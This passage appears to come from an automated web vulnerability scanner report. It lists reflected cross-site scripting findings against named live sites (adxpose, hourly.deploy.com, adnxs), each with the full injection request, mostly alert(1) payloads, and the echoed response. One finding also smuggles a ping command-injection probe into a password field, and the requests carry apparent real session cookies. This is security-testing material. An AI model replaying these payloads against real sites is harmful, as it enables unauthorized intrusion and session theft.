_ate.ad.hprcaea3<script>alert(1)</script>a8615876143({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
6.14. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 35b4c<script>alert(1)</script>b4350c97119 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=79DACCAB16BC495962702839F5429393; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Mon, 25 Apr 2011 14:23:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119");
6.15. https://hourly.deploy.com/hmc/report/ ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000054)</script> request parameter is copied into the HTML document as plain text between tags. The payload e3cac<script>alert(1)</script>5fcd26dde92 was submitted in the '"--></style></script><script>netsparker(0x000054)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script>e3cac<script>alert(1)</script>5fcd26dde92 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</script>e3cac<script>alert(1)</script>5fcd26dde92" method="post">
...[SNIP]...
6.16. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955ef"><script>alert(1)</script>eaec9f444c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?955ef"><script>alert(1)</script>eaec9f444c3=1 HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d830da3836cd39735b3d;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4880


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?955ef"><script>alert(1)</script>eaec9f444c3=1" method="post">
...[SNIP]...
6.17. https://hourly.deploy.com/hmc/report/ [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff7d"><script>alert(1)</script>22906d443c3 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E8ff7d"><script>alert(1)</script>22906d443c3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e8ff7d"><script>alert(1)</script>22906d443c3" method="post">
...[SNIP]...
6.18. https://hourly.deploy.com/hmc/report/ [register parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7121"><script>alert(1)</script>df0c78cb9fa was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?register=1e7121"><script>alert(1)</script>df0c78cb9fa HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:30 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1e7121"><script>alert(1)</script>df0c78cb9fa" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...
6.19. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the '"--></style></script><script>netsparker(0x00004F)</script> request parameter is copied into the HTML document as plain text between tags. The payload e83be<script>alert(1)</script>523da594bd0 was submitted in the '"--></style></script><script>netsparker(0x00004F)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script>e83be<script>alert(1)</script>523da594bd0 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</script>e83be<script>alert(1)</script>523da594bd0" method="post">
...[SNIP]...
6.20. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe1a"><script>alert(1)</script>db5eebe2940 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 63

j_password=%26ping%20-c%2026%20127.0.0.1%20%26&j_username=Smith7fe1a"><script>alert(1)</script>db5eebe2940

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302c38d98d257a233c;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:03 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="Smith7fe1a"><script>alert(1)</script>db5eebe2940" onKeyPress="checkEnter();">
...[SNIP]...
6.21. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7302a"><script>alert(1)</script>4a4bb4d857e243994 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994" method="post">
...[SNIP]...
6.22. https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3979a"><script>alert(1)</script>e93cf277ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:33 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1" method="post">
...[SNIP]...
6.23. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48f1"><script>alert(1)</script>05d2c68e84e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3Ed48f1"><script>alert(1)</script>05d2c68e84e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3ed48f1"><script>alert(1)</script>05d2c68e84e" method="post">
...[SNIP]...
6.24. https://hourly.deploy.com/hmc/report/index.cfm [register parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d039e"><script>alert(1)</script>e3b5619accb was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:31 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...
6.25. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"><script>alert(1)</script>93019b07260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)?20ec4"><script>alert(1)</script>93019b07260=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?20ec4"><script>alert(1)</script>93019b07260=1" method="post">
...[SNIP]...
6.26. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d3a0"><script>alert(1)</script>c00f54e3219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)?7d3a0"><script>alert(1)</script>c00f54e3219=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:11 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?7d3a0"><script>alert(1)</script>c00f54e3219=1" method="post">
...[SNIP]...
6.27. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4615b'-alert(1)-'2e372cc3b5e was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
